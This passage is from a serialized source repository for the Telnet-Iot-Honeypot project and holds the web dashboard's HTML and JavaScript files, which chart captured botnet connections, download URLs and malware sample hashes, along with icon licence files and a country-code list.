Arab Republic\",\"TW\":\"Taiwan, Province of China\",\"TJ\":\"Tajikistan\",\"TZ\":\"Tanzania, United Republic of\",\"TH\":\"Thailand\",\"TL\":\"Timor-Leste\",\"TG\":\"Togo\",\"TK\":\"Tokelau\",\"TO\":\"Tonga\",\"TT\":\"Trinidad and Tobago\",\"TN\":\"Tunisia\",\"TR\":\"Turkey\",\"TM\":\"Turkmenistan\",\"TC\":\"Turks and Caicos Islands\",\"TV\":\"Tuvalu\",\"UG\":\"Uganda\",\"UA\":\"Ukraine\",\"AE\":\"United Arab Emirates\",\"GB\":\"United Kingdom\",\"US\":\"United States\",\"UM\":\"United States Minor Outlying Islands\",\"UY\":\"Uruguay\",\"UZ\":\"Uzbekistan\",\"VU\":\"Vanuatu\",\"VE\":\"Venezuela\",\"VN\":\"Viet Nam\",\"VG\":\"Virgin Islands, British\",\"VI\":\"Virgin Islands, U.S.\",\"WF\":\"Wallis and Futuna\",\"EH\":\"Western Sahara\",\"YE\":\"Yemen\",\"ZM\":\"Zambia\",\"ZW\":\"Zimbabwe\", \"EU\": \"European Union\"};\n"
  },
  {
    "path": "html/fancy/connhash/index.html",
    "content": "<!doctype html>\n<html>\n<head>\n    <title>Network | Hierarchical layout</title>\n\n    <style type=\"text/css\">\n        body {\n            font: 10pt sans;\n        }\n\n        #mynetwork {\n            height: 800px;\n            border: 1px solid lightgray;\n        }\n    </style>\n\n    <script src=\"https://code.jquery.com/jquery-3.2.1.min.js\"></script>\n    <script src=\"http://visjs.org/dist/vis.js\"></script>\n\n    <link rel=\"stylesheet\" href=\"http://visjs.org/dist/vis-network.min.css\">\n\n    <script type=\"text/javascript\">\n        var nodes = [];\n        var edges = [];\n        var network = null;\n        var MAX   = 2000;\n\n        var nodes_dict = {};\n\n        function load() {\n          $.get(\"http://localhost:5000/connhashtree/20\", null, draw);\n        }\n\n        function processNode(node, level) {\n            c  = (MAX - node.count) / MAX * 255;\n            nodes.push({\n                \"level\": level,\n                \"id\":    node.connhash,\n                \"label\": node.count + \"\\n\" + node.text.replace(\"/bin/busybox\", \"\").substr(0, 32),\n                \"color\": \"rgb(\" + c + \",\" + c + \",\" + c + \")\"\n            });\n            nodes_dict[node.connhash] = node;\n            for (var i = 0; i < node.childs.length; i++) {\n                child    = node.childs[i];\n                edges.push({\n                    \"from\": node.connhash,\n                    \"to\":   child.connhash,\n                    \"color\": { 'color' : 'rgb(0,0,0)' }\n                });\n                processNode(child, level + 1);\n            }\n        }\n\n        function draw(data) {\n            data = JSON.parse(data);\n            console.log(data);\n            for (key in data) {\n                processNode(data[key], 0);\n            }\n\n            // create a network\n            var container = document.getElementById('mynetwork');\n            var options = {\n                layout: {\n                    hierarchical: {\n                        direction: \"UD\"\n                    }\n                }\n            };\n\n            data    = { \"edges\": edges, \"nodes\": nodes };\n            network = new vis.Network(container, data, options);\n\n            console.log(data);\n\n            // add event listeners\n            network.on(\"click\", function (params) {\n                if (params.nodes.length == 1)\n                {\n                    var node = nodes_dict[params.nodes[0]];\n                    window.location.href = \"http://localhost:5000/html/index.html#/connection/\" + node.sample_id;\n                }\n            });\n        }\n\n    </script>\n    \n</head>\n\n<body onload=\"load();\">\n<div id=\"mynetwork\"></div>\n</body>\n</html>\n\n"
  },
  {
    "path": "html/fancy/graph/index.html",
    "content": "<html>\n<head>\n\n<meta charset=\"utf-8\"/>\n<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n\n<script src=\"https://code.jquery.com/jquery-3.2.1.min.js\"></script>\n<script src=\"http://visjs.org/dist/vis.js\"></script>\n\n<link rel=\"stylesheet\" href=\"http://visjs.org/dist/vis-network.min.css\">\n<style type=\"text/css\">\n\n.code {\n\tfont-family: monospace;\n}\n\n.code-line.isinput {\n\tfont-weight: bold;\n}\n\n</style>\n<script src=\"../../apiurl.js\"></script>\n<script type=\"text/javascript\">\n\nvar ips        = {};\nvar conns      = {};\nvar urls       = {};\nvar samples    = {};\nvar graph_data = null;\nvar globalnode = null;\n\nfunction print(s)\n{\n  console.log(s);\n  //$(\"#logbox\").append(document.createTextNode( s + \"\\n\" ));\n}\n\nfunction getIPConns(ip, olderthan)\n{\n  var url = api + \"/connections?ip=\" + ip;\n  if (olderthan != null) url += \"&older_than=\" + olderthan + \"&\";\n  \n  $.get(url, null, function (data) {\n    print(\"IPconns: \" + ip + \", \" + olderthan);\n    var myconns = JSON.parse(data);\n    for (var i = 0; i < myconns.length; i++)\n    {\n      getConn(myconns[i].id);\n    }\n    if (myconns.length > 0)\n    {\n      var date = myconns[myconns.length - 1].date;\n      getIPConns(ip, date);\n    }\n  });\n}\n\nfunction getIP(ip, type)\n{\n  if (ip in ips)\n  {\n    return ips[ip];\n  } else {\n    print(\"New ip \" + ip);\n    ips[ip] = {\n      \"ip\":        ip,\n      \"conns\":     {},\n      \"neighbors\": {},\n      \"type\":      type\n    }\n\n    //getIPConns(ip, null);\n\n    return ips[ip];\n  }\n}\n\nfunction gotConn(conn)\n{\n  print(\"Conn:  \" + conn.id);\n\n  // Check if the connection has ANY edge\n  // associates/urls/samples\n  \n  //if (conn.urls.length == 0 && conn.conns_before.length == 0 && conn.conns_after.length == 0)\n  //{\n  //  return;\n  //}\n\n  conns[conn.id] = conn;\n  ip = getIP(conn.ip, \"ip\");\n  \n  for (var i = 0; i < conn.conns_before.length; i++)\n  {\n    assoc_id = conn.conns_before[i][\"id\"];\n    assoc_ip = getIP(conn.conns_before[i][\"ip\"], \"ip\");\n    print(\"Assoc: \" + assoc_id);\n\n    // Connect Associates Connections\n    ip.neighbors[assoc_ip.ip] = assoc_ip;\n    assoc_ip.neighbors[ip.ip] = ip;\n\n    ip.conns[conn.id] = conn;\n    //getConn(assoc_id);\n  }\n\n  // Connect Urls (Resolved IP)\n  for (var u = 0; u < conn.urls.length; u++)\n  {\n    var url    = conn.urls[u];\n    var urlid  = url.url; // url.ip;\n    if (urlid != null && urlid != \"\" ) //&& !url.url.startsWith(\"telnet://\"))\n    {\n      console.log(\"url \" + urlid);\n      var url_ip = getIP(urlid, \"url\");\n\n      // Conn <-> URL\n      ip.neighbors[url_ip.ip] = url_ip;\n      url_ip.neighbors[ip.ip] = ip;\n\n      // URL <-> Sample\n      if (url.sample != null) {\n        var sample_ip = getIP(url.sample, \"sample\");\n        url_ip.neighbors[sample_ip.ip] = sample_ip;\n        sample_ip.neighbors[url_ip.ip] = url_ip;\n      }\n    }\n  }\n}\n\nfunction getConn(id)\n{\n  if (!(id in conns))\n  {\n    $.get(api + \"/connection/\" + id, null, function (data) {\n      gotConn(JSON.parse(data));\n    });\n  }\n}\n\nfunction main()\n{\n  $.get(api + \"/connections\", null, function(data) {\n    var myconns = JSON.parse(data);\n    var max_id = myconns[1].id;\n\n    for (var i = 1; i <= max_id; i++)\n    {\n      getConn(i);\n    }\n  });\n}\n\nfunction addnode()\n{\n\tvar myid = \"\" + Math.random();\n\n\tgraph_data.nodes.add({\n\t\t\"id\":\t\tmyid,\n\t\t\"label\":\t\"newnewnew\" \n\t});\n\t\n\tgraph_data.edges.add({\n\t\t\"id\":   globalnode + \"-\" + myid,\n\t\t\"from\": globalnode,\n\t\t\"to\":   myid,\n\t});\n\t\n}\n\nfunction draw()\n{\n  var nodes = [];\n  var edges = [];\n  var edgeds_hash = {};\n  var nodes2ip = {}\n\n  var counter = 0;\n  for (ip_id in ips) {\n    ip = ips[ip_id];\n    ip.counter = counter;\n\n    nodes2ip[counter] = ip_id;\n\n    var color = \"#ccc\";\n    if (ip.type == \"url\") color = \"#77f\";\n    if (ip.type == \"sample\") color = \"#f77\";\n\n    nodes.push({\n      \"id\": counter,\n      \"label\": ip_id.substr(0,16),\n      \"color\": color\n    });\n    counter++;\n  }\n\n  for (ip_id in ips) {\n    ip = ips[ip_id];\n\n    for (nb_id in ip.neighbors)\n    {\n      nb = ips[nb_id];\n      if (!(nb.counter + \"-\" + ip.counter in edgeds_hash))\n      {\n        edges.push({from: ip.counter, to: nb.counter});\n        edgeds_hash[ip.counter + \"-\" + nb.counter] = true;\n      }\n    }\n  }\n\n  // create a network\n  var container = document.getElementById('mynetwork');\n  graph_data = {\n    nodes: new vis.DataSet(nodes),\n    edges: new vis.DataSet(edges)\n  };\n  var options = {\n    layout: {\n      improvedLayout: false\n    }\n  };\n  var network = new vis.Network(container, graph_data, options);\n  network.on(\"click\", function (params) {\n    if (params.nodes.length == 1)\n    {\n      globalnode = params.nodes[0];\n      //var newip = nodes2ip[params.nodes[0]];\n      //window.location.href = \"https://phype.pythonanywhere.com/#/connections?ip=\" + newip;\n    }\n  });\n}\n\n</script>\n\n</head>\n<body onload=\"main()\">\n\n<button onclick=\"draw()\">draw</button><button onclick=\"addnode()\">addnode</button>\n<div id=\"mynetwork\"></div>\n<pre id=\"logbox\">\n\n</pre>\n\n</body>\n</html>\n"
  },
  {
    "path": "html/img/LICENSE",
    "content": "Bee Icon by alican\nhttps://thenounproject.com/search/?q=bee&i=573797\nCC BY 3.0 (https://creativecommons.org/licenses/by/3.0/us/)\n"
  },
  {
    "path": "html/img/flags/LICENSE",
    "content": "Flag icons - http://www.famfamfam.com\n\nThese icons are public domain, and as such are free for any use (attribution appreciated but not required).\n\nNote that these flags are named using the ISO3166-1 alpha-2 country codes where appropriate. A list of codes can be found at http://en.wikipedia.org/wiki/ISO_3166-1_alpha-2\n\nIf you find these icons useful, please donate via paypal to mjames@gmail.com (or click the donate button available at http://www.famfamfam.com/lab/icons/silk)\n\nContact: mjames@gmail.com\n\n"
  },
  {
    "path": "html/index.html",
    "content": "<html>\n<head>\n\n<meta charset=\"utf-8\"/>\n<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n\n\n<link rel=\"stylesheet\" href=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css\">\n<link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/vis/4.21.0/vis-network.min.css\">\n\n<script src=\"https://code.jquery.com/jquery-3.2.1.slim.min.js\" integrity=\"sha256-k2WSCIexGzOj3Euiig+TlR8gA0EmPjuc79OEeY5L45g=\" crossorigin=\"anonymous\"></script>\n<script src=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js\" integrity=\"sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa\" crossorigin=\"anonymous\"></script>\n\n<script src=\"https://cdnjs.cloudflare.com/ajax/libs/Chart.js/2.4.0/Chart.bundle.min.js\"></script>\n<script src=\"https://cdnjs.cloudflare.com/ajax/libs/vis/4.21.0/vis.min.js\"></script>\n\n<script src=\"https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular.min.js\"></script>\n<script src=\"https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular-route.js\"></script>\n\n<script src=\"https://cdn.jsdelivr.net/angular.chartjs/latest/angular-chart.min.js\"></script>\n<script src=\"js/angular-vis.js\"></script>\n\n<script src=\"common.js\"></script>\n<script src=\"apiurl.js\"></script>\n<script src=\"sample.js\"></script>\n<script src=\"countries.js\"></script>\n\n<style type=\"text/css\">\n\n.code {\n\tfont-family: monospace;\n}\n\n.code-line {\n\twhite-space: pre;\n}\n\n.code-line:hover {\n\twhite-space: pre;\n\tbackground-color: #ddd;\n}\n\n\n.code-line.isinput:hover {\n\tbackground-color: #fcc  ;\n}\n\n.code-line.isinput {\n    color: #a00;\n\tfont-weight: bold;\n}\n\n</style>\n\n</head>\n<body ng-app=\"honey\">\n\n<nav class=\"navbar navbar-default\">\n  <div class=\"container-fluid\">\n  \n    <!-- Brand and toggle get grouped for better mobile display -->\n    <div class=\"navbar-header\">\n      <button type=\"button\" class=\"navbar-toggle collapsed\" data-toggle=\"collapse\" data-target=\"#bs-example-navbar-collapse-1\" aria-expanded=\"false\">\n        <span class=\"sr-only\">Toggle navigation</span>\n        <span class=\"icon-bar\"></span>\n        <span class=\"icon-bar\"></span>\n        <span class=\"icon-bar\"></span>\n      </button>\n      \n      <a class=\"navbar-brand\" href=\"#/\" style=\"padding: 0\"><img src=\"img/icon.svg\" style=\"height: 2em; margin: 10px; display: float; float: left;\"><span style=\"margin: 15px 15px 15px 0px; display: float; float: left;\">Telnet-Iot-Honeypot</span></a>\n    </div>\n\n    <!-- Collect the nav links, forms, and other content for toggling -->\n    <div class=\"collapse navbar-collapse\" id=\"bs-example-navbar-collapse-1\">\n    \n      <ul class=\"nav navbar-nav\">\n        <li><a href=\"#/networks\">Networks</a></li>\n        <li><a href=\"#/urls\">Urls</a></li>\n        <li><a href=\"#/samples\">Samples</a></li>\n        <li><a href=\"#/connections\">Connections</a></li>\n        <li><a href=\"#/tags\">Tags</a></li>\n        <li><a href=\"#/admin\">Admin</a></li>\n      </ul>\n      \n    </div><!-- /.navbar-collapse -->\n  </div><!-- /.container-fluid -->\n</nav>\n\n<!-- Github fork button, actually placed o top right -->\n<a href=\"https://github.com/Phype/telnet-iot-honeypot\" target=\"_blank\" class=\"hidden-xs\">\n\t<img style=\"position: absolute; top: 0; right: 0; border: 0;\" src=\"https://camo.githubusercontent.com/38ef81f8aca64bb9a64448d0d70f1308ef5341ab/68747470733a2f2f73332e616d617a6f6e6177732e636f6d2f6769746875622f726962626f6e732f666f726b6d655f72696768745f6461726b626c75655f3132313632312e706e67\" data-canonical-src=\"https://s3.amazonaws.com/github/ribbons/forkme_right_red_aa0000.png\">\n</a>\n\n<div class=\"container\">\n\t<div ng-view></div>\n</div>\n</body>\n</html>\n"
  },
  {
    "path": "html/js/angular-vis.js",
    "content": "angular.module('ngVis', [])\n\n    .factory('VisDataSet', function () {\n        'use strict';\n        return function (data, options) {\n            // Create the new dataSets\n            return new vis.DataSet(data, options);\n        };\n    })\n\n/**\n * TimeLine directive\n */\n    .directive('visTimeline', function () {\n        'use strict';\n        return {\n            restrict: 'EA',\n            transclude: false,\n            scope: {\n                data: '=',\n                options: '=',\n                events: '='\n            },\n            link: function (scope, element, attr) {\n                var timelineEvents = [\n                    'rangechange',\n                    'rangechanged',\n                    'timechange',\n                    'timechanged',\n                    'select',\n                    'doubleClick',\n                    'click',\n                    'contextmenu'\n                ];\n\n                // Declare the timeline\n                var timeline = null;\n\n                scope.$watch('data', function () {\n                    // Sanity check\n                    console.log(scope.data);\n                    if (scope.data == null) {\n                        return;\n                    }\n\n                    // If we've actually changed the data set, then recreate the graph\n                    // We can always update the data by adding more data to the existing data set\n                    if (timeline != null) {\n                        timeline.destroy();\n                    }\n\n                    // Create the timeline object\n                    console.log(scope.data);\n                    timeline = new vis.Timeline(element[0], scope.data.items, scope.data.groups, scope.options);\n\n                    // Attach an event handler if defined\n                    angular.forEach(scope.events, function (callback, event) {\n                        if (timelineEvents.indexOf(String(event)) >= 0) {\n                            timeline.on(event, callback);\n                        }\n                    });\n\n                    // onLoad callback\n                    if (scope.events != null && scope.events.onload != null &&\n                        angular.isFunction(scope.events.onload)) {\n                        scope.events.onload(timeline);\n                    }\n                });\n\n                scope.$watchCollection('options', function (options) {\n                    if (timeline == null) {\n                        return;\n                    }\n                    timeline.setOptions(options);\n                });\n            }\n        };\n    })\n\n/**\n * Directive for network chart.\n */\n    .directive('visNetwork', function () {\n        return {\n            restrict: 'EA',\n            transclude: false,\n            scope: {\n                data: '=',\n                options: '=',\n                events: '='\n            },\n            link: function (scope, element, attr) {\n                var networkEvents = [\n                    'click',\n                    'doubleclick',\n                    'oncontext',\n                    'hold',\n                    'release',\n                    'selectNode',\n                    'selectEdge',\n                    'deselectNode',\n                    'deselectEdge',\n                    'dragStart',\n                    'dragging',\n                    'dragEnd',\n                    'hoverNode',\n                    'blurNode',\n                    'zoom',\n                    'showPopup',\n                    'hidePopup',\n                    'startStabilizing',\n                    'stabilizationProgress',\n                    'stabilizationIterationsDone',\n                    'stabilized',\n                    'resize',\n                    'initRedraw',\n                    'beforeDrawing',\n                    'afterDrawing',\n                    'animationFinished'\n\n                ];\n\n                var network = null;\n\n                scope.$watch('data', function () {\n                    // Sanity check\n                    if (scope.data == null) {\n                        return;\n                    }\n\n                    // If we've actually changed the data set, then recreate the graph\n                    // We can always update the data by adding more data to the existing data set\n                    if (network != null) {\n                        network.destroy();\n                    }\n\n                    // Create the graph2d object\n                    network = new vis.Network(element[0], scope.data, scope.options);\n\n                    // Attach an event handler if defined\n                    angular.forEach(scope.events, function (callback, event) {\n                        if (networkEvents.indexOf(String(event)) >= 0) {\n                            network.on(event, callback);\n                        }\n                    });\n\n                    // onLoad callback\n                    if (scope.events != null && scope.events.onload != null &&\n                        angular.isFunction(scope.events.onload)) {\n                        scope.events.onload(graph);\n                    }\n                });\n\n                scope.$watchCollection('options', function (options) {\n                    if (network == null) {\n                        return;\n                    }\n                    network.setOptions(options);\n                });\n            }\n        };\n    })\n\n/**\n * Directive for graph2d.\n */\n    .directive('visGraph2d', function () {\n        'use strict';\n        return {\n            restrict: 'EA',\n            transclude: false,\n            scope: {\n                data: '=',\n                options: '=',\n                events: '='\n            },\n            link: function (scope, element, attr) {\n                var graphEvents = [\n                    'rangechange',\n                    'rangechanged',\n                    'timechange',\n                    'timechanged',\n                    'finishedRedraw'\n                ];\n\n                // Create the chart\n                var graph = null;\n\n                scope.$watch('data', function () {\n                    // Sanity check\n                    if (scope.data == null) {\n                        return;\n                    }\n\n                    // If we've actually changed the data set, then recreate the graph\n                    // We can always update the data by adding more data to the existing data set\n                    if (graph != null) {\n                        graph.destroy();\n                    }\n\n                    // Create the graph2d object\n                    graph = new vis.Graph2d(element[0], scope.data.items, scope.data.groups, scope.options);\n\n                    // Attach an event handler if defined\n                    angular.forEach(scope.events, function (callback, event) {\n                        if (graphEvents.indexOf(String(event)) >= 0) {\n                            graph.on(event, callback);\n                        }\n                    });\n\n                    // onLoad callback\n                    if (scope.events != null && scope.events.onload != null &&\n                        angular.isFunction(scope.events.onload)) {\n                        scope.events.onload(graph);\n                    }\n                });\n\n                scope.$watchCollection('options', function (options) {\n                    if (graph == null) {\n                        return;\n                    }\n                    graph.setOptions(options);\n                });\n            }\n        };\n    })\n;\n\n"
  },
  {
    "path": "html/network.html",
    "content": "\n<h1>Network Info</h1>\n<div class=\"row\">\n\t<div class=\"col-md-6 col-xs-12\">\n\t\t<table class=\"table\">\n\n\t\t\t<tr><td>id</td><td><b>#{{ network.id }}</b></td></tr>\n\t\t\t<tr><td>Malware</td><td><b>{{ network.malware.name != null ? network.malware.name : fakenames[network.malware.id] }}</b> <a href=\"#/malware/{{ network.malware.id }}\">see</a></td></tr>\n\t\t\t<tr><td>Connections</td><td><b>{{ network.firstconns }} / {{ network.connections }}</b> from <b>{{ formatDate(network.firsttime) }}</b> to <b>{{ formatDate(network.lasttime) }}</b> <a href=\"#/connections?network_id={{ network.id }}\">see all</a></td></tr>\n\t\t\t<tr><td>Urls</td><td>{{ network.urls }}</td></tr>\n\t\t\t<tr><td>Samples</td><td>{{ network.samples }}</td></tr>\n\n\t\t</table>\n\t</div>\n\n\t<div class=\"col-md-6 col-xs-12\">\n\t\t<!--<h2>Connections from the Network <small><a href=\"#/connections?network_id={{ network.id }}\">see all</a></small></h2>-->\n\t\t<div style=\"height: 15em; width: 100%\">\n\t\t<canvas id=\"timechart\" class=\"chart chart-line\"\n\t\t\tchart-data=\"timechart_data\" chart-options=\"timechart_options\"\n\t\t\tchart-labels=\"timechart_labels\" chart-colors=\"timechart_colors\">\n\t\t</canvas>\n\t\t</div>\n\t\t<center><small><b>Initial Connections per Hour</b></small></center>\n\t</div>\n\n\t<div class=\"col-md-12 col-xs-12\">\n\t\t<h2>Connections by honeypot</h2>\n\t\t\n\t\t<table class=\"table table-condensed\">\n\t\t\t<tr>\n\t\t\t\t<th>Name</th>\n\t\t\t\t<th>Connections</th>\n\t\t\t</tr>\n\t\t\t<tr ng-repeat=\"(name, count) in network.honeypots\">\n\t\t\t\t<td>{{ name }}</td>\n\t\t\t\t<td>{{ count }}</td>\n\t\t\t</tr>\n\t\t</table>\n\t</div>\n\n\t<div class=\"col-md-12 col-xs-12\">\n\t\t<h2>Network graph <small><a ng-click=\"loadgraph()\">load graph</a></small></h2>\n\t\t<div style=\"width: 100%; height: 30em;\" ng-show=\"graph_enabled\">\n\t\t\t<vis-network data=\"graph_data\" options=\"graph_options\" events=\"graph_events\"></vis-network>\n\t\t</div>\n\t</div>\n</div>\n"
  },
  {
    "path": "html/networks.html",
    "content": "<h1>Networks</h1>\n\n<!--<h2>Connections from the Network <small><a href=\"#/connections?network_id={{ network.id }}\">see all</a></small></h2>-->\n\n<center><small><b>Initial Connections per Hour</b></small></center>\n<div style=\"height: 15em; width: 100%\">\n<canvas id=\"timechart\" class=\"chart chart-line\"\n\tchart-data=\"timechart_data\" chart-options=\"timechart_options\"\n\tchart-labels=\"timechart_labels\" chart-series=\"timechart_series\">\n</canvas>\n</div>\n\n\n<table class=\"table table-condensed\">\n\n\t<tr>\n\t\t<th>#</th>\n\t\t<th>Malware</th>\n\t\t<th>N⁰ initial Conn's</th>\n\t\t<!-- <th>No IPs</th> -->\n\t\t<th>N⁰ Urls</th>\n\t\t<th>N⁰ Samples</th>\n\t</tr>\n\t<tr ng-repeat=\"network in networks | filter:filterNoSamples | orderBy:'-order'\">\n\t\t<td><a href=\"#/network/{{ network.id }}\">#{{network.id}}</a></td>\n\t\t<td><a href=\"#/malware/{{ network.malware.id }}\">{{ network.malware.name != null ? network.malware.name : fakenames[network.malware.id] }}</a></td>\n\t\t<td>{{ network.firstconns }}</td>\n\t\t<!-- <td>{{ network.ips.length }}</td> -->\n\t\t<td>{{ network.urls }}</td>\n\t\t<td>{{ network.samples }}</td>\n\t</tr>\n\n</table>\n"
  },
  {
    "path": "html/overview.html",
    "content": "<img src=\"img/icon.svg\" style=\"height: 10em; margin-top: -4em; padding: 1em; background: white;\" class=\"pull-right\">\n\n<div class=\"page-header\">\n\t<h1>Telnet-Iot-Honeypot <small>Python honeypot for catching botnet binaries </small></h1>\n</div>\n\n<p>\n\tThis is the start page of this installation of the Telnet-Iot-Honeypot.<br>\n\tMore info: <a href=\"https://github.com/Phype/telnet-iot-honeypot\" target=\"_blank\">https://github.com/Phype/telnet-iot-honeypot</a>\n</p>\n\n<h2>Latest Urls</h2>\n\n<table class=\"table table-condensed\">\n\n\t<tr>\n\t\t<th>Url</th>\n\t\t<th>Date</th>\n\t\t<th class=\"hidden-xs\">Sample</th>\n\t\t<th class=\"hidden-xs\">N⁰ Connections</th>\n\t</tr>\n\t<tr ng-repeat=\"url in urls | limitTo : 5\">\n\t\t<td><a href=\"{{ '#/url/' + encurl(url.url) }}\">{{ url.url }}</a></td>\n\t\t<td>{{ formatDate(url.date) }}</td>\n\t\t<td class=\"hidden-xs\"><span ng-show=\"url.sample != null\"><a href=\"{{ '#/sample/' + url.sample }}\">{{ short(url.sample, 16) }}</a></span></td>\n\t\t<td class=\"hidden-xs\">{{ url.connections }}</td>\n\t</tr>\n\n</table>\n\n<h2>Latest Samples</h2>\n\n<table class=\"table table-condensed\">\n\n\t<tr>\n\t\t<th class=\"hidden-xs\">SHA256</th>\n\t\t<th>Name</th>\n\t\t<th>Size (Bytes)</th>\n\t\t<th>First Seen</th>\n\t\t<th class=\"hidden-xs\">N⁰ Urls</th>\n\t</tr>\n\t<tr ng-repeat=\"sample in samples | limitTo : 3\">\n\t\t<td class=\"hidden-xs\"><span ng-show=\"sample.sha256 != null\"><a href=\"{{ '#/sample/' + sample.sha256 }}\">{{ short(sample.sha256, 16) }}</a></span></td>\n\t\t<td><a href=\"{{ '#/sample/' + sample.sha256 }}\">{{ sample.name }}</a></td>\n\t\t<td>{{ sample.length }}</a></td>\n\t\t<td>{{ formatDate(sample.date) }}</td>\n\t\t<td class=\"hidden-xs\">{{ sample.urls }}</td>\n\t</tr>\n\n</table>\n\n\n<h2>Latest Connections <small><a href=\"#/connections\">more</a></small></h2>\n\n<div class=\"row\">\n\t<div class=\"col-md-9 col-sm-12\">\n\n\t\t<table class=\"table table-condensed\">\n\n\t\t\t<tr>\n\t\t\t\t<th>Date</th>\n\t\t\t\t<th>Country</th>\n\t\t\t\t<!-- <th>IP</th> -->\n\t\t\t\t<th>Username</th>\n\t\t\t\t<th>Password</th>\n\t\t\t\t<th class=\"hidden-xs\">N⁰ Urls</th>\n\t\t\t</tr>\n\t\t\t<tr ng-repeat=\"connection in connections | limitTo : 8\">\n\t\t\t\t<td><a href=\"{{ '#/connection/' + connection.id }}\">{{ formatDate(connection.date) }}</a></td>\n\t\t\t\t<td><img src=\"img/flags/{{ connection.country.toLowerCase() }}.png\">  {{ connection.country }}</td>\n\t\t\t\t<!-- <td>{{ connection.ip }}</td> -->\n\t\t\t\t<td>{{ connection.user }}</a></td>\n\t\t\t\t<td>{{ connection.password }}</td>\n\t\t\t\t<td class=\"hidden-xs\">{{ connection.urls }}</td>\n\t\t\t</tr>\n\n\t\t</table>\n\t</div>\n\n\t<div class=\"col-sm-3 col-xs-1 hidden-md hidden-lg\"><!-- spacer --></div>\n\n\t<div class=\"col-md-3 col-sm-6 col-xs-10\">\n\t\t<canvas id=\"doughnut\" class=\"chart chart-doughnut\"\n\t\t\tchart-data=\"country_stats_values\" chart-labels=\"country_stats_labels\"\n\t\t\tchart-click=\"clickchart_countries\" chart-options=\"chart_options\">\n\t\t</canvas>\n\t\t<br>\n\t\t<center><small><b>All Connections by Country</b><br>Click on country to see all connections</small></center>\n\t</div>\n\n\t<div class=\"\">\n\t</div>\n</div>\n"
  },
  {
    "path": "html/sample.html",
    "content": "<h1>Sample Info</h1>\n\n<table class=\"table\">\n\n\t<tr><td>First seen</td><td>{{ formatDate(sample.date) }}</td></tr>\n\t<tr><td>First seen file name</td><td>{{ sample.name }}</td></tr>\n\t<tr><td>File size</td><td>{{ sample.length }} Bytes</td></tr>\n\t<tr><td>SHA256</td><td>{{ sample.sha256 }}</td></tr>\n\t<tr>\n\t\t<td>Virustotal result</a></td>\n\t\t<td>\n\t\t\t<a href=\"https://www.virustotal.com/latest-scan/{{ sample.sha256 }}\" target=\"_blank\" ng-show=\"sample.result != null\">\n\t\t\t\t<span class=\"glyphicon glyphicon-link\"></span> {{ sample.result }}\n\t\t\t</a>\n\t\t\t<span ng-show=\"sample.result == null\">Unknown, <a href=\"https://www.virustotal.com/latest-scan/{{ sample.sha256 }}\" target=\"_blank\">search yourself</a></span>\n\t\t</td>\n\t</tr>\n\t<tr><td>Network / Malware</td><td>\n\t\t<a href=\"#/network/{{ sample.network.id }}\">#{{ sample.network.id }}</a>\n\t\t<span> / </span>\n\t\t<a href=\"#/malware/{{ sample.network.malware.id }}\">{{ sample.network.malware.name != null ? sample.network.malware.name : fakenames[sample.network.malware.id] }}</a>\n\t</td></tr>\n\n</table>\n\n<h2>Download Info</h2>\n\n<pre>{{ sample.info }}</pre>\n\n<h2>Downloaded from</h2>\n\n<table class=\"table\">\n\n\t<tr>\n\t\t<th>Url</th>\n\t\t<th>Date</th>\n\t\t<th>N⁰ Connections</th>\n\t</tr>\n\t<tr ng-repeat=\"url in sample.urls\">\n\t\t<td><a href=\"{{ '#/url/' + encurl(url.url) }}\">{{ url.url }}</a></td>\n\t\t<td>{{ formatDate(url.date) }}</td>\n\t\t<td>{{ url.connections.length }}</td>\n\t</tr>\n\n</table>\n"
  },
  {
    "path": "html/sample.js",
    "content": "var isMobile = false; //initiate as false\n// device detection\nif(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|ipad|iris|kindle|Android|Silk|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i.test(navigator.userAgent) \n    || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 